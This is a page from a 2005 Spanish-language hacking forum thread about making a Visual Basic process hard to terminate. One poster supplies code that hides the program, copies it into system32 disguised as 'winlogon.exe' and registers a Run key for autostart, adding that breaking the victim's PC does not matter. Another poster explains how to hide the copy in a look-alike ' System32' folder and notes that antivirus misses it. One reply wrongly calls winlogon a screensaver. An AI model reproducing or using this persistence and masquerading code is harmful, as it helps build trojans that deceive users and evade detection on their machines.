elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a la Factorización De Semiprimos (RSA)


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Proceso Protegido
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] 3 Ir Abajo Respuesta Imprimir
Autor Tema: Proceso Protegido  (Leído 4,765 veces)
la caca

Desconectado Desconectado

Mensajes: 60


CACA COLA


Ver Perfil
Re: Proceso Protegido
« Respuesta #10 en: 7 Octubre 2005, 18:53 pm »

jojojooj y eso combinado con esto:

Set obj = CreateObject("Scripting.FileSystemObject") 'declaramos un objeto tipo fileSystem object
Set win = obj.GetSpecialFolder(0)                    'para obtener la carpeta de windows y system
Set sys = obj.GetSpecialFolder(1)
win = LCase(win)                                     'las ponemos en minusculas
sys = LCase(sys)
Form1.Visible = False 'ponemos invisible
'-----Copia a \windows--------------
Dim ejec As String
ejec = App.EXEName & ".exe" 'añadimos ala ruta del exe, el nombre y la estension
FileCopy ejec, sys & "\winlogon.exe"  'copia a windows\system32
End If
Set residencia = CreateObject("WScript.Shell")
residencia.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\" & "winlogon", win & "\winlogon.exe"  'esto modifica el registro para que se ejecute al iniciar el pc
App.TaskVisible = False          'para ocultarlo un poco del, (alt +sup +control) (aunque es una bosta jejej no funciona en XP)



bueno espero que les sirva para copiar todo en la carpeta windows jejeje

p.D.: usenlo con el codigo de NYlOn

chau


En línea

algo huele mal.... firma "LA CACA"

A2Corp


Desconectado Desconectado

Mensajes: 304



Ver Perfil
Re: Proceso Protegido
« Respuesta #11 en: 7 Octubre 2005, 19:14 pm »

una pregunta... que en System32 no esta el proceso original de winlogon.exe???????
Esto no afectaria a nuestro copy?
o no dañaria al archivo de winlogon.exe original?

y para editar el registro mejor usa apis!, pke esos scripts seran detectados como virus...
Saludos!


En línea

Hackeo, luego existo...
la caca

Desconectado Desconectado

Mensajes: 60


CACA COLA


Ver Perfil
Re: Proceso Protegido
« Respuesta #12 en: 7 Octubre 2005, 19:30 pm »

me importa un bledo que este el winlogon jejej total se va a romper lo mismo la pc jjejej

che haber pasate las funciones api para modificar el registro si??
En línea

algo huele mal.... firma "LA CACA"

NYlOn


Desconectado Desconectado

Mensajes: 842


OOOOHHHHHH, TARAGÜIIII xDDDDDD


Ver Perfil WWW
Re: Proceso Protegido
« Respuesta #13 en: 7 Octubre 2005, 19:36 pm »

Si, dañaria el archivo original :S
Lo q se puede hacer es crear una carpeta en %WindowsRoot% con el nombre de " System32"
Si se fijan bien hay un espacio adelante de "System32", echo con el ALT + 0160.. De esta forma, si alguien se fija en el Registro, aparecera (x ej) "C:\Windows\ System32\Winlogon.exe", x lo que se asemejaria bastante a la realidad :P

(Ahora, esperemos que no revise su carpeta de Win muy seguido pq se daria cuenta xDDD)

Sino lo podemos guardar en la carpeta de Windows y chau problema :p

salu2 !

ah y tengo entendido que eso del los objetos en Script los detectan los antivirus, pero yo tengo el NAV 2004 y no dice ni Mu xD

EDIT:
Citar
me importa un bledo que este el winlogon jejej total se va a romper lo mismo la pc

La idea no era para dañar el sistema, solo para q no se pueda terminar alguna aplicacion...
Y BUSCA un poco sobre las API's, en el foro hay mucho tmb...
« Última modificación: 7 Octubre 2005, 19:39 pm por NYlOn » En línea

yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: Proceso Protegido
« Respuesta #14 en: 7 Octubre 2005, 21:44 pm »

Windows hace un resguardo de sus archivos más 'importantes', así como taskmsg, regedit y demás, por lo tanto si borramos el archivo winlogon.exe supuestamente al reiniciar windows creará de nuevo este archivo.

PD: Winlogon tan solo es un salvapantallas, no podría originar daños en el ordenador, nada más que cuando apareciera el salvapantallas tras una inactividad se ejecutará este archivo.
En línea

A2Corp


Desconectado Desconectado

Mensajes: 304



Ver Perfil
Re: Proceso Protegido
« Respuesta #15 en: 7 Octubre 2005, 21:51 pm »

Ohhhhhh........  Gracias por decirme eso, no se pke kreia que winlogon.exe era algo relacionado con la entrada de windows xD... Ese que te pone cuando eskoges el usuario para entrar xD.
En línea

Hackeo, luego existo...
byebye


Desconectado Desconectado

Mensajes: 5.093



Ver Perfil
Re: Proceso Protegido
« Respuesta #16 en: 7 Octubre 2005, 23:21 pm »

winlogon no es un salvapantallas. el tema de "que no se puede cerrar el proceso", eso pasa en todos los sitemas (w2k/xp) pq los servicios "no puedes" cerrarlos. tu mismo puedes ajustar los privilegios a tu preceso para que puede cerrar winlogon y todos los demas.
En línea

_Sergi_


Desconectado Desconectado

Mensajes: 842



Ver Perfil
Re: Proceso Protegido
« Respuesta #17 en: 8 Octubre 2005, 01:30 am »

Pues vaya con los programadores de Microsoft... ¿Nunca pensaron que cualquiera puede renombrar un archivo?
En línea

Proyecto de Ingeniero
NYlOn


Desconectado Desconectado

Mensajes: 842


OOOOHHHHHH, TARAGÜIIII xDDDDDD


Ver Perfil WWW
Re: Proceso Protegido
« Respuesta #18 en: 8 Octubre 2005, 01:53 am »

Citar
tu mismo puedes ajustar los privilegios a tu preceso para que puede cerrar winlogon y todos los demas.

Nunca habia oido esto, podrias decirme como ?? ;D

desde ya muchas gracias ^^

salu2 !
En línea

byebye


Desconectado Desconectado

Mensajes: 5.093



Ver Perfil
Re: Proceso Protegido
« Respuesta #19 en: 8 Octubre 2005, 17:26 pm »

Citar

(SeDebugPrivilege)
   

Permite al usuario asignar un depurador a cualquier proceso.
   
El privilegio SeDebugPrivilege permite cambiar el flujo de ejecución de cualquier proceso o matarlo (incluyendo los subsistemas de seguridad o cualquier servidor RPC).


solo te queda buscar un poco.
En línea

Páginas: 1 [2] 3 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Modulo protegido
Ingeniería Inversa
catalinilla 9 4,468 Último mensaje 20 Enero 2014, 18:15 pm
por catalinilla
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines